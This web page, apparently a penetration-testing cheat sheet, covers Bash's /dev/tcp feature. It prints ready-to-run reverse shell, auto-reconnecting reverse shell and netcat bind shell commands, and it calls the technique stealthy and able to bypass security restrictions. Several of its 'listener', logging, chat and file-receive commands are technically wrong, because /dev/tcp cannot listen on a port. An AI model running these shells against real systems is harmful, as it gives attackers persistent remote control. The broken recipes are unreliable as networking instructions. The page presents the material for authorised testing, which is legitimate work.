🔗 /dev/tcp: Remote Connectivity for Penetration Testing
The /dev/tcp feature in Linux provides a powerful method for establishing TCP connections directly from the shell. Commonly used in penetration testing, /dev/tcp enables security professionals to create reverse shells, test network connectivity, and execute commands over a remote connection—all without requiring external networking tools.
⚡ Why Use /dev/tcp?
🔹 Built-in Functionality: /dev/tcp is a feature of the Bash shell, requiring no additional installations.
🔹 Stealthy Connectivity: Since it doesn’t rely on traditional networking tools like Netcat, it can bypass certain security restrictions.
🔹 Versatile Usage: Used for port scanning, reverse shells, and sending data over TCP connections.
🔹 Minimal Footprint: Ideal for use in restricted environments where installing additional binaries is not an option.
🆚 /dev/tcp vs. Netcat
| Feature | /dev/tcp | Netcat (nc) |
|---|---|---|
| Availability | Built into Bash | Requires installation |
| Stealth | Less detectable | More detectable |
| Ease of Use | Complex syntax | Easier syntax |
| Features | Basic connectivity | Advanced networking options |
🛠 Common /dev/tcp Use Cases
🔍 Checking Open Ports
Quickly determine if a remote port is open or closed:
> echo > /dev/tcp/192.168.1.1/80 && echo "Port open" || echo "Port closed"
If the connection is successful, "Port open" is printed; otherwise, "Port closed" appears.
🔄 Sending Data Over TCP
Send a simple message to a listening server on a specified port:
> echo "Hello, server!" > /dev/tcp/192.168.1.1/1234
This sends "Hello, server!" to 192.168.1.1 on port 1234.
📡 Connecting to a Remote Server and Fetching a Web Page
Manually retrieve an HTTP response from a web server:
> exec 3<> /dev/tcp/example.com/80
echo -e "GET / HTTP/1.1\nHost: example.com\nConnection: close\n\n" >&3
cat <&3
exec 3>&-
This sends an HTTP request to example.com and displays the response.
🏴☠️ Establishing a Reverse Shell
Connect back to an attacker’s system to execute remote commands:
> bash -i >& /dev/tcp/192.168.1.1/4444 0>&1
This creates an interactive reverse shell to 192.168.1.1 on port 4444.
🎤 Creating a Simple Chat System
Open a shell-based chat between two machines. On machine 1 (listener):
> while true; do cat < /dev/tcp/0.0.0.0/4444; done
On machine 2 (sender):
> while true; do read msg; echo "$msg" > /dev/tcp/192.168.1.1/4444; done
Now, both machines can exchange messages over port 4444.
🚀 Basic TCP Port Scanner
Loop through a list of ports and check which ones are open:
> for port in {20..100}; do
(echo > /dev/tcp/192.168.1.1/$port) &>/dev/null && echo "Port $port is open"
done
Scans ports 20 to 100 on 192.168.1.1 and lists the open ones.
🔄 Setting Up a Simple TCP Listener
Create a listener that receives messages from a remote machine:
> while true; do nc -l -p 4444 | while read line; do echo "Received: $line"; done; done
Now any remote system can send messages to this listener using:
> echo "Test message" > /dev/tcp/192.168.1.1/4444
This is useful for basic logging and communication.
📥 File Transfer via /dev/tcp
Send a file from machine 1 to machine 2. On the receiving machine:
> cat < /dev/tcp/192.168.1.1/4444 > received_file.txt
On the sending machine:
> cat file_to_send.txt > /dev/tcp/192.168.1.2/4444
This sends the file over TCP without requiring SCP or FTP.
🌍 Transferring Files Between Machines (Base64 Encoding for Safety)
If binary files are corrupted during transfer, use Base64 encoding. On the sender’s machine:
> base64 file_to_send.bin | cat > /dev/tcp/192.168.1.2/4444
On the receiving machine, decode it:
> cat < /dev/tcp/192.168.1.1/4444 | base64 -d > received_file.bin
This ensures file integrity over the transfer.
🔗 Bridging Two Machines (Tunneling Traffic)
Use /dev/tcp to tunnel data from one machine to another:
> cat < /dev/tcp/192.168.1.1/8080 > /dev/tcp/192.168.1.2/9090
This forwards data from port 8080 on 192.168.1.1 to port 9090 on 192.168.1.2.
📊 Logging Network Activity
Monitor incoming data on a port and log it to a file:
> while true; do cat < /dev/tcp/0.0.0.0/5555 >> connections.log; done
All incoming data on port 5555 is saved in connections.log.
🔥 Creating a Bind Shell (Allow Remote Access to Your Shell)
Set up a shell that listens for incoming connections:
> while true; do nc -l -p 9999 -e /bin/bash; done
Now, anyone can connect and execute commands using:
> nc 192.168.1.1 9999
🏁 Auto-Reconnecting Reverse Shell
If a reverse shell connection is lost, reconnect automatically:
> while true; do bash -i >& /dev/tcp/192.168.1.1/4444 0>&1; sleep 10; done
This will attempt to reconnect every 10 seconds if disconnected.
🔬 Simple Port Knocking
Check if a sequence of ports are open before executing a command:
> (for port in 1234 5678 9012; do echo > /dev/tcp/192.168.1.1/$port; sleep 1; done) && echo "Knock successful"If all ports respond, "Knock successful" is printed.
🎛 Key /dev/tcp Techniques
| Command Example | Description |
|---|---|
echo > /dev/tcp/IP/PORT | Test if a port is open |
cat < /dev/tcp/IP/PORT | Read data from a remote port |
bash -i >& /dev/tcp/IP/PORT 0>&1 | Establish a reverse shell |
exec 3<> /dev/tcp/IP/PORT | Open a full-duplex connection |
while read line; do echo $line; done < /dev/tcp/IP/PORT | Create a basic network listener |
⚠️ Ethical and Legal Considerations
Using /dev/tcp for remote access or penetration testing must be done ethically and legally. Security professionals should:
✅ Obtain explicit permission before testing systems.
✅ Use /dev/tcp only in authorized penetration tests.
✅ Avoid unintended disruptions to networks and services.
✅ Document findings responsibly for reporting and security improvement.
🎬 Conclusion: Using /dev/tcp in Ethical Hacking
The /dev/tcp feature is a valuable, built-in networking tool for penetration testers. Whether for port scanning, remote access, or establishing connections, it offers a stealthy alternative to traditional networking utilities.
👉 Ready to generate your own /dev/tcp commands? Use our interactive command generator above to customize your setup!